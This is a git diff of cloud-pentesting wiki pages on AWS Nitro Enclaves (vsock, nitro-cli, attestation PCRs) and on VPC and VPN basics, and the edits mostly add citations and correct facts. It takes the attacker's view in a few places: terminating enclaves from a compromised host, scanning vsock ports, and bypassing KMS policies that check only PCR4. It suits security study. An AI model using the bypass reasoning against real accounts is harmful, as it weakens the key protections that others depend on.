 
-If an attacker compromise an EC2 instance by default he won't be able to get a shell inside of them, but he will be able to **terminate them** with:
+An attacker with sufficient local privileges on the parent instance cannot use Nitro CLI to obtain an interactive shell in an enclave, but can **terminate** it with:<sup>[[4]](#references)[[11]](#references)</sup>
 
 ```shell
 nitro-cli terminate-enclave --enclave-id ${ENCLAVE_ID}
@@ -106,14 +104,14 @@ nitro-cli terminate-enclave --enclave-id ${ENCLAVE_ID}
 
 ## Vsocks
 
-The only way to communicate with an **enclave** running image is using **vsocks**.
+The only way to communicate with an **enclave** running image is using **vsocks**.<sup>[[12]](#references)[[13]](#references)</sup>
 
-**Virtual Socket (vsock)** is a socket family in Linux specifically designed to facilitate **communication** between virtual machines (**VMs**) and their **hypervisors**, or between VMs **themselves**. Vsock enables efficient, **bi-directional communication** without relying on the host's networking stack. This makes it possible for VMs to communicate even without network configurations, **using a 32-bit Context ID (CID) and port numbers** to identify and manage connections. The vsock API supports both stream and datagram socket types, similar to TCP and UDP, providing a versatile tool for user-level applications in virtual environments.
+**Virtual Socket (vsock)** is a socket family in Linux specifically designed to facilitate **communication** between virtual machines (**VMs**) and their **hypervisors**, or between VMs **themselves**. Vsock enables efficient, **bi-directional communication** without relying on the host's networking stack. This makes it possible for VMs to communicate even without network configurations, **using a 32-bit Context ID (CID) and port numbers** to identify and manage connections. The vsock API supports both stream and datagram socket types, similar to TCP and UDP, providing a versatile tool for user-level applications in virtual environments.<sup>[[1]](#references)[[14]](#references)</sup>
 
 > [!TIP]
-> Therefore, an vsock address looks like this: `<CID>:<Port>`
+> Therefore, an vsock address looks like this: `<CID>:<Port>`<sup>[[13]](#references)[[14]](#references)</sup>
 
-To find **CIDs** of the enclave running images you could just execute the following cmd and thet the **`EnclaveCID`**:
+To find **CIDs** of the enclave running images you could just execute the following cmd and thet the **`EnclaveCID`**:<sup>[[9]](#references)</sup>
 
 <pre class="language-bash"><code class="lang-bash">nitro-cli describe-enclaves
 
@@ -142,13 +140,15 @@ To find **CIDs** of the enclave running images you could just execute the follow
 </code></pre>
 
 > [!WARNING]
-> Note that from the host there isn't any way to know if a CID is exposing any port! Unless using some **vsock port scanner like** [**https://github.com/carlospolop/Vsock-scanner**](https://github.com/carlospolop/Vsock-scanner).
+> Note that from the host there isn't any way to know if a CID is exposing any port! Unless using some **vsock port scanner like** [**https://github.com/carlospolop/Vsock-scanner**](https://github.com/carlospolop/Vsock-scanner).<sup>[[17]](#references)</sup>
 
 ### Vsock Server/Listener
 
 Find here a couple of examples:
 
-- [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py)
+- [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py)<sup>[[15]](#references)</sup>
+
+The compact Python listener and client examples below are generic vsock examples; for AWS Nitro Enclaves, use the parent/enclave CIDs described above rather than assuming the generic host constant.<sup>[[1]](#references)[[13]](#references)</sup>
 
 <details>
 
@@ -191,7 +191,7 @@ socat VSOCK-LISTEN:<port>,fork EXEC:"echo Hello from server!"
 
 Examples:
 
-- [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py)
+- [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py)<sup>[[16]](#references)</sup>
 
 <details>
 
@@ -222,20 +222,20 @@ echo "Hello, vsock!" | socat - VSOCK-CONNECT:3:5000
 
 ### Vsock Proxy
 
-The tool vsock-proxy allows to proxy a vsock proxy with another address, for example:
+The tool vsock-proxy allows a vsock endpoint to proxy traffic to another address, for example:<sup>[[7]](#references)[[12]](#references)</sup>
 
 ```bash
 vsock-proxy 8001 ip-ranges.amazonaws.com 443 --config your-vsock-proxy.yaml
 ```
 
-This will forward the **local port 8001 in vsock** to `ip-ranges.amazonaws.com:443` and the file **`your-vsock-proxy.yaml`** might have this content allowing to access `ip-ranges.amazonaws.com:443`:
+This will forward the **local port 8001 in vsock** to `ip-ranges.amazonaws.com:443` and the file **`your-vsock-proxy.yaml`** might have this content allowing to access `ip-ranges.amazonaws.com:443`:<sup>[[7]](#references)[[12]](#references)</sup>
 
 ```yaml
 allowlist:
   - { address: ip-ranges.amazonaws.com, port: 443 }
 ```
 
-It's possible to see the vsock addresses (**`<CID>:<Port>`**) used by the EC2 host with (note the `3:8001`, 3 is the CID and 8001 the port):
+It's possible to see the vsock addresses (**`<CID>:<Port>`**) used by the EC2 host with (note the `3:8001`, 3 is the CID and 8001 the port):<sup>[[12]](#references)[[13]](#references)</sup>
 
 ```bash
 sudo ss -l -p -n | grep v_str
@@ -244,32 +244,47 @@ v_str LISTEN 0      0                                                           
 
 ## Nitro Enclave Atestation & KMS
 
-The Nitro Enclaves SDK allows an enclave to request a **cryptographically signed attestation document** from the Nitro **Hypervisor**, which includes **unique measurements** specific to that enclave. These measurements, which include **hashes and platform configuration registers (PCRs)**, are used during the attestation process to **prove the enclave's identity** and **build trust with external services**. The attestation document typically contains values like PCR0, PCR1, and PCR2, which you have encountered before when building and saving an enclave EIF.
+The Nitro Enclaves SDK allows an enclave to request a **cryptographically signed attestation document** from the Nitro **Hypervisor**, which includes **unique measurements** specific to that enclave. These measurements, which include **hashes and platform configuration registers (PCRs)**, are used during the attestation process to **prove the enclave's identity** and **build trust with external services**. The attestation document typically contains values like PCR0, PCR1, and PCR2, which you have encountered before when building and saving an enclave EIF.<sup>[[18]](#references)</sup>
 
-From the [**docs**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-3-cryptographic-attestation#a-unique-feature-on-nitro-enclaves), these are the PCR values:
+From the [**docs**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-3-cryptographic-attestation#a-unique-feature-on-nitro-enclaves), these are the PCR values:<sup>[[18]](#references)</sup>
 
 <table><thead><tr><th width="97">PCR</th><th width="221">Hash of ...</th><th>Description</th></tr></thead><tbody><tr><td>PCR0</td><td>Enclave image file</td><td>A contiguous measure of the contents of the image file, without the section data.</td></tr><tr><td>PCR1</td><td>Linux kernel and bootstrap</td><td>A contiguous measurement of the kernel and boot ramfs data.</td></tr><tr><td>PCR2</td><td>Application</td><td>A contiguous, in-order measurement of the user applications, without the boot ramfs.</td></tr><tr><td>PCR3</td><td>IAM role assigned to the parent instance</td><td>A contiguous measurement of the IAM role assigned to the parent instance. Ensures that the attestation process succeeds only when the parent instance has the correct IAM role.</td></tr><tr><td>PCR4</td><td>Instance ID of the parent instance</td><td>A contiguous measurement of the ID of the parent instance. Ensures that the attestation process succeeds only when the parent instance has a specific instance ID.</td></tr><tr><td>PCR8</td><td>Enclave image file signing certificate</td><td>A measure of the signing certificate specified for the enclave image file. Ensures that the attestation process succeeds only when the enclave was booted from an enclave image file signed by a specific certificate.</td></tr></tbody></table>
 
-You can integrate **cryptographic attestation** into your applications and leverage pre-built integrations with services like **AWS KMS**. AWS KMS can **validate enclave attestations** and offers attestation-based condition keys (`kms:RecipientAttestation:ImageSha384` and `kms:RecipientAttestation:PCR`) in its key policies. These policies ensure that AWS KMS permits operations using the KMS key **only if the enclave's attestation document is valid** and meets the **specified conditions**.
+You can integrate **cryptographic attestation** into your applications and leverage pre-built integrations with services like **AWS KMS**. AWS KMS can **validate enclave attestations** and offers attestation-based condition keys (`kms:RecipientAttestation:ImageSha384` and `kms:RecipientAttestation:PCR`) in its key policies. These policies ensure that AWS KMS permits operations using the KMS key **only if the enclave's attestation document is valid** and meets the **specified conditions**.<sup>[[18]](#references)[[19]](#references)[[20]](#references)</sup>
 
 > [!TIP]
-> Note that Enclaves in debug (--debug) mode generate attestation documents with PCRs that are made of zeros (`000000000000000000000000000000000000000000000000`). Therefore, KMS policies checking these values will fail.
+> Note that Enclaves in debug (--debug) mode generate attestation documents with PCRs that are made of zeros (`000000000000000000000000000000000000000000000000`). Therefore, KMS policies checking these values will fail.<sup>[[18]](#references)</sup>
 
 ### PCR Bypass
 
-From an attackers perspective, notice that some PCRs would allow to modify some parts or all the enclave image and would still be valid (for example PCR4 just checks the ID of the parent instance so running any enclave image in that EC2 will allow to fulfil this potential PCR requirement).
+From an attacker's perspective, the PCR definitions imply that a policy checking only PCR4 would allow an enclave image to change while still matching the parent instance ID; in contrast, PCR0-2 measure the image, kernel/bootstrap, and application. This means that running another enclave image on the same EC2 instance could satisfy a policy that checks only PCR4.<sup>[[18]](#references)</sup>
 
-Therefore, an attacker that compromise the EC2 instance might be able to run other enclave images in order to bypass these protections.
+Therefore, an attacker that compromises the EC2 instance might be able to run other enclave images in order to bypass these protections.<sup>[[18]](#references)</sup>
 
-The research on how to modify/create new images to bypass each protection (spcially the not taht obvious ones) is still TODO.
+The research on how to modify/create new images to bypass each protection (especially the less obvious ones) is still TODO.
 
 ## References
 
-- [https://medium.com/@F.DL/understanding-vsock-684016cf0eb0](https://medium.com/@F.DL/understanding-vsock-684016cf0eb0)
-- All the parts of the Nitro tutorial from AWS: [https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli)
+- [1] [Understanding Vsock](https://medium.com/@F.DL/understanding-vsock-684016cf0eb0)
+- [2] [AWS Nitro Enclaves CLI workshop](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli)
+- [3] [AWS Nitro System](https://aws.amazon.com/ec2/nitro/)
+- [4] [What is Nitro Enclaves? - AWS Nitro Enclaves](https://docs.aws.amazon.com/enclaves/latest/user/nitro-enclave.html)
+- [5] [Install the Nitro Enclaves CLI on Linux - AWS Nitro Enclaves](https://docs.aws.amazon.com/enclaves/latest/user/nitro-enclave-cli-install.html)
+- [6] [Building an enclave image file - AWS Nitro Enclaves](https://docs.aws.amazon.com/enclaves/latest/user/building-eif.html)
+- [7] [Running AI-ML Object Detection Model to Process Confidential Data using Nitro Enclaves](https://aws.amazon.com/blogs/compute/running-ai-ml-object-detection-model-to-process-confidential-data-using-nitro-enclaves/)
+- [8] [nitro-cli run-enclave - AWS Nitro Enclaves](https://docs.aws.amazon.com/enclaves/latest/user/cmd-nitro-run-enclave.html)
+- [9] [nitro-cli describe-enclaves - AWS Nitro Enclaves](https://docs.aws.amazon.com/enclaves/latest/user/cmd-nitro-describe-enclaves.html)
+- [10] [nitro-cli console - AWS Nitro Enclaves](https://docs.aws.amazon.com/enclaves/latest/user/cmd-nitro-console.html)
+- [11] [nitro-cli terminate-enclave - AWS Nitro Enclaves](https://docs.aws.amazon.com/enclaves/latest/user/cmd-nitro-terminate-enclave.html)
+- [12] [Nitro Enclaves concepts - AWS Nitro Enclaves](https://docs.aws.amazon.com/enclaves/latest/user/nitro-enclave-concepts.html)
+- [13] [Getting started: Connect the parent instance with an enclave by using virtio-vsock - AWS Nitro Enclaves](https://docs.aws.amazon.com/enclaves/latest/user/enclave-networking.html)
+- [14] [vsock(7) - Linux manual page](https://man7.org/linux/man-pages/man7/vsock.7.html)
+- [15] [AWS Nitro Enclaves workshop server.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py)
+- [16] [AWS Nitro Enclaves workshop client.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py)
+- [17] [Vsock-scanner](https://github.com/carlospolop/Vsock-scanner)
+- [18] [Cryptographic attestation - AWS Nitro Enclaves](https://docs.aws.amazon.com/enclaves/latest/user/set-up-attestation.html)
+- [19] [Cryptographic attestation support in AWS KMS](https://docs.aws.amazon.com/kms/latest/developerguide/cryptographic-attestation.html)
+- [20] [Condition keys for AWS KMS](https://docs.aws.amazon.com/kms/latest/developerguide/policy-conditions.html)
+- [21] [Instances built on the AWS Nitro System - Amazon EC2](https://docs.aws.amazon.com/ec2/latest/instancetypes/ec2-nitro-instances.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md
@@ -1,44 +1,39 @@
 # AWS - VPC & Networking Basic Information
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## AWS Networking in a Nutshell
 
-A **VPC** contains a **network CIDR** like 10.0.0.0/16 (with its **routing table** and **network ACL**).
+A **VPC** is a logically isolated virtual network that you define in AWS. It has one or more network CIDR blocks and can contain subnets, route tables, network ACLs, security groups, gateways, and IP addresses.<sup>[[1]](#references)</sup>
 
-This VPC network is divided in **subnetworks**, so a **subnetwork** is directly **related** with the **VPC**, **routing** **table** and **network ACL**.
+This VPC network is divided into **subnets**. Each subnet belongs to a VPC and is associated with one route table and one network ACL.<sup>[[1]](#references)[[4]](#references)[[6]](#references)</sup>
 
-Then, **Network Interface**s attached to services (like EC2 instances) are **connected** to the **subnetworks** with **security group(s)**.
+**Network interfaces** attached to services (such as EC2 instances) are placed in subnets and can have one or more **security groups** associated with them.<sup>[[1]](#references)[[7]](#references)</sup>
 
-Therefore, a **security group** will limit the exposed ports of the network **interfaces using it**, **independently of the subnetwork**. And a **network ACL** will **limit** the exposed ports to to the **whole network**.
+Therefore, a **security group** limits the traffic reaching or leaving the resources associated with it, independently of the subnet. A **network ACL** allows or denies traffic at the **subnet** level; unlike a security group, it is stateless.<sup>[[6]](#references)[[7]](#references)</sup>
 
-Moreover, in order to **access Internet**, there are some interesting configurations to check:
+To **access the internet**, check the following configurations:
 
-- A **subnetwork** can **auto-assign public IPv4 addresses**
-- An **instance** created in the network that **auto-assign IPv4 addresses can get one**
-- An **Internet gateway** need to be **attached** to the **VPC**
-  - You could also use **Egress-only internet gateways**
-- You could also have a **NAT gateway** in a **private subnet** so it's possible to **connect to external services** from that private subnet, but it's **not possible to reach them from the outside**.
-  - The NAT gateway can be **public** (access to the internet) or **private** (access to other VPCs)
+- A **subnet** has an attribute that controls whether a new network interface automatically receives a public IPv4 address, and an instance launch can override that setting.<sup>[[2]](#references)</sup>
+- An **internet gateway** must be attached to the **VPC**, and the subnet's route table must contain a route to it for internet access. For IPv6-only internet access, use an **egress-only internet gateway**.<sup>[[1]](#references)[[4]](#references)</sup>
+- A private subnet can route outbound traffic through a **public NAT gateway located in a public subnet** to reach the internet while preventing unsolicited inbound connections. A **private NAT gateway** can instead provide translated connectivity to other VPCs or on-premises networks.<sup>[[10]](#references)</sup>
 
 ![AWS VPC networking diagram with public and private subnets, internet gateway, NAT gateway, and cloud access](<../../../../images/image (274).png>)
 
 ## VPC
 
-Amazon **Virtual Private Cloud** (Amazon VPC) enables you to **launch AWS resources into a virtual network** that you've defined. This virtual network will have several subnets, Internet Gateways to access Internet, ACLs, Security groups, IPs...
+Amazon **Virtual Private Cloud** (Amazon VPC) enables you to **launch AWS resources into a virtual network** that you've defined. This virtual network can contain subnets, internet gateways, ACLs, security groups, and IP addresses.<sup>[[1]](#references)</sup>
 
 ### Subnets
 
-Subnets helps to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure.
+Subnets help enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure.
 
-- Valid CIDR are from a /16 netmask to a /28 netmask.
-- A subnet cannot be in different availability zones at the same time.
-- **AWS reserves the first three host IP addresses** of each subnet **for** **internal AWS usage**: the first host address used is for the VPC router. The second address is reserved for AWS DNS and the third address is reserved for future use.
-- It's called **public subnets** to those that have **direct access to the Internet, whereas private subnets do not.**
+- For IPv4, valid subnet CIDR blocks range from a `/16` netmask to a `/28` netmask.<sup>[[3]](#references)</sup>
+- A subnet cannot be in different availability zones at the same time.<sup>[[20]](#references)</sup>
+- **AWS reserves five IPv4 addresses** in each subnet: the network address, the first three host addresses (for the VPC router, AWS DNS, and future use), and the final address (the broadcast address, which AWS does not support).<sup>[[3]](#references)</sup>
+- A subnet is **public** when its route table sends internet-bound traffic to an internet gateway; instances still need a public IPv4 address or IPv6 address to communicate through that gateway. A subnet without such a route is **private**.<sup>[[20]](#references)</sup>
 
 ### Route Tables
 
-Route tables determine the traffic routing for a subnet within a VPC. They determine which network traffic is forwarded to the internet or to a VPN connection. You will usually find access to the:
+Route tables determine how traffic is routed from a subnet within a VPC. Each route specifies a destination and a target, such as an internet gateway, VPN gateway, NAT gateway, peering connection, or gateway VPC endpoint.<sup>[[4]](#references)[[5]](#references)</sup>
 
 - Local VPC
 - NAT
@@ -48,142 +43,163 @@ Route tables determine the traffic routing for a subnet within a VPC. They deter
 
 ### ACLs
 
-**Network Access Control Lists (ACLs)**: Network ACLs are firewall rules that control incoming and outgoing network traffic to a subnet. They can be used to allow or deny traffic to specific IP addresses or ranges.
+**Network Access Control Lists (ACLs)** are firewall rules that allow or deny incoming and outgoing traffic at the subnet level. NACLs are stateless, so return traffic must be allowed explicitly.<sup>[[6]](#references)</sup>
 
-- It’s most frequent to allow/deny access using security groups, but this is only way to completely cut established reverse shells. A modified rule in a security groups doesn’t stop already established connections
-- However, this apply to the whole subnetwork be careful when forbidding stuff because needed functionality might be disturbed
+- It is more common to allow or deny access with security groups, but a subnet-level NACL can be useful for cutting traffic that a stateful security-group change may leave flowing on an established connection.<sup>[[6]](#references)[[7]](#references)</sup>
+- NACL rules apply to the whole subnet, so be careful when blocking traffic because required functionality may be disrupted.<sup>[[6]](#references)</sup>
 
 ### Security Groups
 
-Security groups are a virtual **firewall** that control inbound and outbound network **traffic to instances** in a VPC. Relation 1 SG to M instances (usually 1 to 1).\
-Usually this is used to open dangerous ports in instances, such as port 22 for example:
+Security groups are a virtual **firewall** that controls inbound and outbound network **traffic to resources** in a VPC. One security group can be associated with many resources, and a resource can have multiple security groups.<sup>[[7]](#references)</sup>\
+Usually this is used to open dangerous ports in instances, such as port 22 for example:<sup>[[7]](#references)</sup>
 
 <figure><img src="https://lh5.googleusercontent.com/LliB7eb3cYfkEyOpyw1-eYgWsn2kq1yF6uRn5VYndvOuTvDlURimYx9UvuK8F2impTLmx50mid4MdTXE-Ljt2i_rxaIfnKUdji_hFjCdU9tdoW-axng9-W4tSL71gbbjrPQ7IYY5lAdH_G3UoMRMGGGOxQ=s2048" alt=""><figcaption></figcaption></figure>
 
 ### Elastic IP Addresses
 
-An _Elastic IP address_ is a **static IPv4 address** designed for dynamic cloud computing. An Elastic IP address is allocated to your AWS account, and is yours until you release it. By using an Elastic IP address, you can mask the failure of an instance or software by rapidly remapping the address to another instance in your account.
+An _Elastic IP address_ is a **static public IPv4 address** designed for dynamic cloud computing. An Elastic IP address is allocated to your AWS account, and is yours until you release it. By using an Elastic IP address, you can mask the failure of an instance or software by rapidly remapping the address to another instance in your account.<sup>[[8]](#references)</sup>
 
 ### Connection between subnets
 
-By default, all subnets have the **automatic assigned of public IP addresses turned off** but it can be turned on.
+Each subnet has an attribute controlling the **automatic assignment of public IPv4 addresses**; it can be enabled or disabled, and an instance launch can override the subnet setting.<sup>[[2]](#references)</sup>
 
-**A local route within a route table enables communication between VPC subnets.**
+**A local route within a route table enables communication between VPC subnets.**<sup>[[4]](#references)</sup>
 
-If you are **connection a subnet with a different subnet you cannot access the subnets connected** with the other subnet, you need to create connection with them directly. **This also applies to internet gateways**. You cannot go through a subnet connection to access internet, you need to assign the internet gateway to your subnet.
+Each subnet uses its associated route table; routes are not inherited from an adjacent subnet. Internet-bound traffic can target the VPC's internet gateway directly, or a private subnet can target a NAT gateway that resides in a public subnet.<sup>[[4]](#references)[[10]](#references)</sup>
 
 ### VPC Peering
 
-VPC peering allows you to **connect two or more VPCs together**, using IPV4 or IPV6, as if they were a part of the same network.
+VPC peering allows you to **connect two VPCs together**, using IPv4 or IPv6, so resources can communicate using private addresses as if they were part of the same network. A VPC can have multiple one-to-one peering connections.<sup>[[9]](#references)</sup>
 
-Once the peer connectivity is established, **resources in one VPC can access resources in the other**. The connectivity between the VPCs is implemented through the existing AWS network infrastructure, and so it is highly available with no bandwidth bottleneck. As **peered connections operate as if they were part of the same network**, there are restrictions when it comes to your CIDR block ranges that can be used.\
-If you have **overlapping or duplicate CIDR** ranges for your VPC, then **you'll not be able to peer the VPCs** together.\
-Each AWS VPC will **only communicate with its peer**. As an example, if you have a peering connection between VPC 1 and VPC 2, and another connection between VPC 2 and VPC 3 as shown, then VPC 1 and 2 could communicate with each other directly, as can VPC 2 and VPC 3, however, VPC 1 and VPC 3 could not. **You can't route through one VPC to get to another.**
+Once the peering connection is established, each VPC's route tables must contain routes for the peer CIDR. The VPCs cannot have matching or overlapping IPv4 or IPv6 CIDR blocks.<sup>[[9]](#references)</sup>\
+Peering is not transitive: if VPC 1 is peered with VPC 2 and VPC 2 is peered with VPC 3, VPC 1 and VPC 3 cannot communicate through VPC 2. **You can't route through one VPC to get to another.**<sup>[[9]](#references)</sup>
 
 ### **VPC Flow Logs**
 
-Within your VPC, you could potentially have hundreds or even thousands of resources all communicating between different subnets both public and private and also between different VPCs through VPC peering connections. **VPC Flow Logs allow you to capture IP traffic information that flows between your network interfaces of your resources within your VPC**.
+Within your VPC, you could potentially have hundreds or even thousands of resources communicating between public and private subnets and between VPCs through peering connections. **VPC Flow Logs allow you to capture information about IP traffic going to and from network interfaces** in a VPC, subnet, or individual network interface.<sup>[[11]](#references)</sup>
 
-Unlike S3 access logs and CloudFront access logs, the **log data generated by VPC Flow Logs is not stored in S3. Instead, the log data captured is sent to CloudWatch logs**.
+Flow log data can be published to **CloudWatch Logs or Amazon S3**. When publishing to CloudWatch Logs, each network interface has a unique log stream in the log group.<sup>[[11]](#references)[[14]](#references)</sup>
 
 Limitations:
 
-- If you are running a VPC peered connection, then you'll only be able to see flow logs of peered VPCs that are within the same account.
-- If you are still running resources within the EC2-Classic environment, then unfortunately you are not able to retrieve information from their interfaces
-- Once a VPC Flow Log has been created, it cannot be changed. To alter the VPC Flow Log configuration, you need to delete it and then recreate a new one.
-- The following traffic is not monitored and captured by the logs. DHCP traffic within the VPC, traffic from instances destined for the Amazon DNS Server.
-- Any traffic destined to the IP address for the VPC default router and traffic to and from the following addresses, 169.254.169.254 which is used for gathering instance metadata, and 169.254.169.123 which is used for the Amazon Time Sync Service.
-- Traffic relating to an Amazon Windows activation license from a Windows instance
-- Traffic between a network load balancer interface and an endpoint network interface
+- Flow logs cannot be enabled for a peered VPC unless the peer VPC is in the same account.<sup>[[12]](#references)</sup>
+- After a flow log is created, its configuration and record format cannot be changed; delete it and create a new one to change them.<sup>[[12]](#references)</sup>
+- The following traffic is not monitored and captured by the logs:<sup>[[12]](#references)</sup>
+  - DHCP traffic within the VPC.
+  - Traffic from instances destined for the Amazon DNS server.
+  - Traffic destined to the reserved IP address for the VPC default router.
+  - Traffic to and from `169.254.169.254`, which is used for instance metadata.
+  - Traffic to and from `169.254.169.123`, which is used for the Amazon Time Sync Service.
+  - Traffic relating to an Amazon Windows activation license from a Windows instance.
+  - Traffic between a network load balancer interface and an endpoint network interface.
 
-For every network interface that publishes data to the CloudWatch log group, it will use a different log stream. And within each of these streams, there will be the flow log event data that shows the content of the log entries. Each of these **logs captures data during a window of approximately 10 to 15 minutes**.
+Each flow log record captures traffic during an aggregation interval of up to 10 minutes; a one-minute interval can be selected, and Nitro-based instances always use an interval of one minute or less. The service typically delivers logs to CloudWatch Logs in about five minutes and to S3 in about ten minutes, but delivery is best effort.<sup>[[13]](#references)</sup>
 
 ## VPN
 
 ### Basic AWS VPN Components
 
 1. **Customer Gateway**:
-   - A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection.
-   - It is essentially a physical device or software application on your side of the Site-to-Site VPN connection.
-   - You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway.
-   - It serves as a reference point for setting up the VPN connection and doesn't incur additional charges.
+   - A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection.<sup>[[15]](#references)[[16]](#references)</sup>
+   - It is essentially a physical device or software application on your side of the Site-to-Site VPN connection.<sup>[[15]](#references)[[16]](#references)</sup>
+   - You provide routing information and information about your device, typically the static public-facing IP address of your network device (such as a router or a firewall), to AWS to create a Customer Gateway.<sup>[[16]](#references)</sup>
+   - It serves as a reference point for setting up the VPN connection; the Site-to-Site VPN connection itself is billed by connection-hour and data transfer.<sup>[[15]](#references)[[16]](#references)</sup>
 2. **Virtual Private Gateway**:
-   - A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection.
-   - It is attached to your VPC and serves as the target for your VPN connection.
-   - VPG is the AWS side endpoint for the VPN connection.
-   - It handles the secure communication between your VPC and your on-premises network.
+   - A Virtual Private Gateway (VGW) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection.<sup>[[16]](#references)</sup>
+   - It is attached to your VPC and serves as the target for your VPN connection.<sup>[[16]](#references)</sup>
+   - The VGW is the AWS-side endpoint for the VPN connection.<sup>[[16]](#references)</sup>
+   - It handles the secure communication between your VPC and your on-premises network.<sup>[[16]](#references)</sup>
 3. **Site-to-Site VPN Connection**:
-   - A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel.
-   - This type of connection requires a Customer Gateway and a Virtual Private Gateway.
-   - It's used for secure, stable, and consistent communication between your data center or network and your AWS environment.
-   - Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection.
+   - A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel.<sup>[[15]](#references)[[16]](#references)</sup>
+   - This type of connection requires a Customer Gateway and a target gateway (a Virtual Private Gateway or a Transit Gateway).<sup>[[16]](#references)</sup>
+   - It's used for secure, stable, and consistent communication between your data center or network and your AWS environment.<sup>[[15]](#references)</sup>
+   - Typically used for regular, long-term connections and is billed by connection-hour and data transfer.<sup>[[15]](#references)[[16]](#references)</sup>
 4. **Client VPN Endpoint**:
-   - A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions.
-   - It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network.
-   - It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks.
-   - With Client VPN, each client device uses a VPN client software to establish a secure connection.
+   - A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions.<sup>[[17]](#references)</sup>
+   - It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network.<sup>[[17]](#references)</sup>
+   - It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks.<sup>[[17]](#references)</sup>
+   - With Client VPN, each client device uses a VPN client software to establish a secure connection.<sup>[[17]](#references)</sup>
 
 ### Site-to-Site VPN
 
-**Connect your on premisses network with your VPC.**
+**Connect your on-premises network with your VPC.**<sup>[[15]](#references)</sup>
 
-- **VPN connection**: A secure connection between your on-premises equipment and your VPCs.
-- **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS.
+- **VPN connection**: A secure connection between your on-premises equipment and your VPCs.<sup>[[15]](#references)</sup>
+- **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS.<sup>[[15]](#references)</sup>
 
-  Each VPN connection includes two VPN tunnels which you can simultaneously use for high availability.
+  Each VPN connection includes two VPN tunnels which you can simultaneously use for high availability.<sup>[[15]](#references)</sup>
 
-- **Customer gateway**: An AWS resource which provides information to AWS about your customer gateway device.
-- **Customer gateway device**: A physical device or software application on your side of the Site-to-Site VPN connection.
-- **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.
-- **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.
+- **Customer gateway**: An AWS resource which provides information to AWS about your customer gateway device.<sup>[[15]](#references)</sup>
+- **Customer gateway device**: A physical device or software application on your side of the Site-to-Site VPN connection.<sup>[[15]](#references)</sup>
+- **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.<sup>[[15]](#references)</sup>
+- **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.<sup>[[15]](#references)</sup>
 
 #### Limitations
 
-- IPv6 traffic is not supported for VPN connections on a virtual private gateway.
-- An AWS VPN connection does not support Path MTU Discovery.
+- IPv6 traffic is not supported for VPN connections on a virtual private gateway; IPv6 inner traffic is supported on transit gateways and Cloud WAN. A single Site-to-Site VPN connection cannot carry both IPv4 and IPv6 traffic, so separate connections are required.<sup>[[15]](#references)[[16]](#references)</sup>
+- An AWS VPN connection does not support Path MTU Discovery.<sup>[[15]](#references)</sup>
 
 In addition, take the following into consideration when you use Site-to-Site VPN.
 
